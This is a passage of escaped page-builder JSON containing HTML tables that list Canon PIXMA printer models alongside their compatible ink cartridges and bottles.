E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 